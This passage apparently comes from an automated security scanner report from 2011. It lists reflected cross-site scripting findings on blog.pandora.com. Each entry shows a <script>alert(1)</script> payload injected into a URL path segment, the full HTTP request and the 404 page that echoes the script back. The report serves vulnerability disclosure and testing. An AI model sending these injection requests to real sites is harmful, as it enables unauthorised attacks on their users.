<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)</script>9908a654cd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)</script>58d715564b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)</script>a0d7ecee19d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)</script>23fb059918f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)</script>4ab9dcf9e4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)</script>0065a69c7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)</script>d935da65367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)</script>04772bbc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)</script>cbd4cc45e8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)</script>3e9b7737a01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)</script>2e63fd05877 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)</script>8d5991e8eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)</script>2c5162fd032 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)</script>d78d8cd256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)</script>15a4ca42e12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)</script>eae0ddbe282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)</script>e2bfea7bc51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)</script>3aa6b3a6382 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)</script>25633d7f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 344 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)</script>15c03653159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
